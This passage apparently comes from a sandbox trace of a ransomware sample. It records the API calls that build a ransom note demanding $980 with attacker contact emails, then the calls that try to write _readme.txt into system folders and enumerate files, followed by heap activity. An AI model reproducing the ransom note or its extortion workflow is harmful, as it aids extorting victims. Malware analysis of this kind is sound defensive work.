that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.598] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.598] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.598] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.598] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.598] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.598] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.599] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.599] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.599] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.599] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.599] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, 